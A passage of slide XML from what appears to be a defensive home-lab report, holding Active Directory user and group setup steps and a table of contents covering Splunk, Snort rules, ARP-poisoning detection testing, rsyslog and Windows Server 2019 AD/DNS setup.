            <a:ext cx="596836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50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Next,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right-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>clicked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newly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created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OU,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selected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New,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then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Group,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assigned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name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to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group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4880"/>
            <a:ext cx="4572000" cy="27363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72279"/>
            <a:ext cx="4679950" cy="36512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908659"/>
            <a:ext cx="5908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then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created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new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user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by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clicking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OU,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selecting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New,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User,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-95" b="1" i="1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where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specified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user's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name,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username,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password,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ensuring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check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the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Password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-100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never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50" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>expires,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option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6461226"/>
            <a:ext cx="560324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100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>To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add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user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group,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right-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>clicked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user,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went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Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>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clicked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 b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Member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Of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="165" b="1" i="1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tab,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clicked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Add,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entered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name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of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our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OU,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clicked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Check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Names,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finally </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>clicked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OK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14272"/>
            <a:ext cx="3577590" cy="28507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11979"/>
            <a:ext cx="2247900" cy="1971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2786" y="4380103"/>
            <a:ext cx="2237740" cy="20034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7152449"/>
            <a:ext cx="3084576" cy="185927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78179"/>
            <a:ext cx="5964555" cy="818007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Contents</a:t>
            </a:r>
            <a:endParaRPr sz="16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225"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Topology,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75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2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Tables.................................................................................................3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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Setup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Ubuntu1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>..................................................................................................4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 spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Repositories</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Upgrade</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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75">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Packages:.............................................................................4</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="152400" marR="5080">
              <a:lnSpc>
                <a:spcPct val="147300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-11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10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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5">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10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5">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Account</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Download</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10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20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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5">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Enterprise:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>......................................4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Accept</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-11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5">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>License</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-11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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Agreement</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Start</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-105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45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Service:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>..................................................................5</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="5">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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5">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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5">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Interface:...................................................................................................5</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="152400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-8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5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-8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5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Receiving:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>........................................................................................6</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="152400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Installing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Additional </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Dashboard</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45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5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Apps:.......................................................................................6</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" marR="5080" indent="-140335">
              <a:lnSpc>
                <a:spcPct val="147300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Snort,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Forwarder</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Ubuntu2.................................................................7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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Installing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Snort:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-125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95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>........................................................................................................................7</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" marR="5080">
              <a:lnSpc>
                <a:spcPct val="147300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Backup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45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20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Customization</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-4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45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55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35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configuration:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-16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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>....................................................................7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7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Custom</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-4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7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Rules:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-19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 spc="-95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>...................................................................................................8</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" marR="5080">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="155"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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 spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Rule</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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 spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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 spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Alerts:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-19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7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>....................................................................8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8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45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8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Testing:.....................................................................................................................9</a:t>
            </a:r>
            <a:endParaRPr sz="11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450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Enabling</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Rsyslog:...........................................................................................10</a:t>
            </a:r>
            <a:endParaRPr sz="11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635"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Installing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Forwarder:...........................................................................10</a:t>
            </a:r>
            <a:endParaRPr sz="11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625"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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10" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35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10" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Script:....................................................................................................11</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" marR="5080" indent="-140335">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="160"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Setting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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1" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>up</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75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 spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Active</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75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 spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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1" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-8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 spc="80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85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11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75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1" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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1" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75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11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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1" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>2019</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20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11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>........................................12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11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Installing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Active</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25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 spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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1" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-4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1" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>DNS:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85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11" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>........................................................................................12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445"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
